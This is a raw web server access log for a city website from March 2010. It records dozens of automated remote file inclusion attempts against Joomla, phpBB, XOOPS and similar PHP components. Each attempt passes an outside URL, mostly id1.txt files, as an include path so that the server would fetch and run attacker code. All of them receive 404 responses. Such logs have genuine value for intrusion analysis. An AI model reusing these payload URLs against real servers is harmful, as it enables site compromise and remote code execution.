200.93.147.154 - - [01/Mar/2010:03:20:53 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:20:53 -0800] "GET /logs/access_090101.log//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:21:13 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:21:14 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:21:14 -0800] "GET /logs/access_081231.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:21:54 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:21:54 -0800] "GET /logs/access_090101.log//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:21:57 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:23:37 -0800] "GET /logs/access_090101.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:25:01 -0800] "GET /logs/access_091231.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:25:01 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:25:01 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:25:25 -0800] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:30:06 -0800] "GET /logs//sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:30:09 -0800] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:30:11 -0800] "GET /logs/access.log//sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:33:46 -0800] "GET /logs/access_081231.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:33:46 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:33:49 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:35:04 -0800] "GET /logs/access_090101.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.140.23.24 - - [01/Mar/2010:03:36:03 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.140.23.24 - - [01/Mar/2010:03:36:03 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.140.23.24 - - [01/Mar/2010:03:36:03 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.111.95.42 - - [01/Mar/2010:03:36:43 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.meuveiculonovo.com//includes/Cache/ts?????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
193.111.95.42 - - [01/Mar/2010:03:36:43 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.meuveiculonovo.com//includes/Cache/ts?????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
62.140.23.24 - - [01/Mar/2010:03:38:02 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.140.23.24 - - [01/Mar/2010:03:38:06 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.140.23.24 - - [01/Mar/2010:03:38:06 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.140.23.24 - - [01/Mar/2010:03:38:18 -0800] "GET /logs/access_090601.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:38:36 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:39:05 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:39:05 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:42:13 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:42:36 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:42:41 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.209.97.201 - - [01/Mar/2010:03:42:48 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.209.97.201 - - [01/Mar/2010:03:42:48 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.209.97.201 - - [01/Mar/2010:03:42:48 -0800] "GET /logs/access_090601.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:43:12 -0800] "GET /logs/access_090601.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:43:21 -0800] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:43:21 -0800] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:43:21 -0800] "GET /logs/access_090201.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:43:22 -0800] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:43:23 -0800] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:43:23 -0800] "GET /logs/access_090201.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.209.97.201 - - [01/Mar/2010:03:43:37 -0800] "GET /logs/access_090701.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.199.51 - - [01/Mar/2010:03:43:42 -0800] "GET / HTTP/1.1" 200 917 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:43:59 -0800] "GET /logs/access_100201.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:44:00 -0800] "GET /logs/access_100201.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.209.97.201 - - [01/Mar/2010:03:44:48 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.209.97.201 - - [01/Mar/2010:03:44:48 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.209.97.201 - - [01/Mar/2010:03:44:48 -0800] "GET /logs/access_090601.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.209.97.201 - - [01/Mar/2010:03:45:00 -0800] "GET /logs/access_090601.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.209.97.201 - - [01/Mar/2010:03:45:01 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.209.97.201 - - [01/Mar/2010:03:45:01 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.209.97.201 - - [01/Mar/2010:03:46:06 -0800] "GET /logs/access_090701.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.47.80.42 - - [01/Mar/2010:03:48:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "cityofarkadelphia.com"
193.47.80.42 - - [01/Mar/2010:03:48:39 -0800] "GET /?N=D HTTP/1.1" 200 917 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "cityofarkadelphia.com"
207.46.195.233 - - [01/Mar/2010:03:51:42 -0800] "GET /?M=A HTTP/1.1" 200 917 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
123.143.29.250 - - [01/Mar/2010:03:57:21 -0800] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [01/Mar/2010:03:57:21 -0800] "GET /logs/access_090330.log//modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [01/Mar/2010:03:57:22 -0800] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.204.181 - - [01/Mar/2010:04:09:13 -0800] "GET /logs/access_090801.log HTTP/1.1" 200 336114 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
207.46.204.181 - - [01/Mar/2010:04:21:46 -0800] "GET /Downloads/?M=A HTTP/1.1" 200 671 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:04:50:07 -0800] "GET /logs/access_091201.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:04:50:07 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:04:50:07 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:04:50:18 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:04:50:18 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:04:50:18 -0800] "GET /logs/access_091201.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:04:50:28 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:04:50:28 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:04:50:28 -0800] "GET /logs/access_091201.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.150.78.218 - - [01/Mar/2010:04:52:35 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.150.78.218 - - [01/Mar/2010:04:52:35 -0800] "GET /logs/access_090329.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.150.78.218 - - [01/Mar/2010:04:52:35 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.108.237.12 - - [01/Mar/2010:04:54:32 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.108.237.12 - - [01/Mar/2010:04:54:32 -0800] "GET /logs/access_090329.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.108.237.12 - - [01/Mar/2010:04:54:32 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.53.29.34 - - [01/Mar/2010:04:56:25 -0800] "GET /logs/access_090301.log HTTP/1.1" 200 16044145 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1)LookThereItIs.Com/20061010 Firefox/2.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:01:24 -0800] "GET /com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:01:24 -0800] "GET /logs//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:01:25 -0800] "GET /logs/access_100101.log//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:01:34 -0800] "GET /com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:01:35 -0800] "GET /logs/access_100101.log//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:01:35 -0800] "GET /logs//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.204.238 - - [01/Mar/2010:05:03:45 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:03:56 -0800] "GET /logs/access_091201.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:03:56 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:03:56 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:04:33 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:04:33 -0800] "GET /logs/access_091201.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:04:34 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:06:48 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:06:49 -0800] "GET /logs///includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:06:49 -0800] "GET /logs/access_091201.log///includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:05:09:45 -0800] "GET /index.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:05:09:45 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:05:09:46 -0800] "GET /logs/access_081101.log%20%20/index.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:10:00 -0800] "GET /logs/access_091201.log///includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:10:00 -0800] "GET /logs///includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:05:10:00 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:05:10:08 -0800] "GET /index.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:05:10:08 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:05:10:08 -0800] "GET /logs/access_081101.log%20%20/index.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.15.39.12 - - [01/Mar/2010:05:15:57 -0800] "HEAD /logs/ HTTP/1.1" 200 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "cityofarkadelphia.com"
204.15.39.12 - - [01/Mar/2010:05:15:57 -0800] "GET /logs/ HTTP/1.1" 200 4227 "-" "Botslist Botfinder (+http://www.botslist.ca)" "cityofarkadelphia.com"
204.15.39.12 - - [01/Mar/2010:05:16:11 -0800] "HEAD /logs/access.log HTTP/1.1" 206 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "cityofarkadelphia.com"
204.15.39.12 - - [01/Mar/2010:05:16:11 -0800] "GET /logs/access.log HTTP/1.1" 206 198879 "-" "Botslist Botfinder (+http://www.botslist.ca)" "cityofarkadelphia.com"
204.15.39.12 - - [01/Mar/2010:05:16:12 -0800] "HEAD /logs/access_081230.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "cityofarkadelphia.com"
204.15.39.12 - - [01/Mar/2010:05:16:13 -0800] "HEAD /logs/access_081231.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "cityofarkadelphia.com"
204.15.39.12 - - [01/Mar/2010:05:16:13 -0800] "HEAD /logs/access_090101.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "cityofarkadelphia.com"
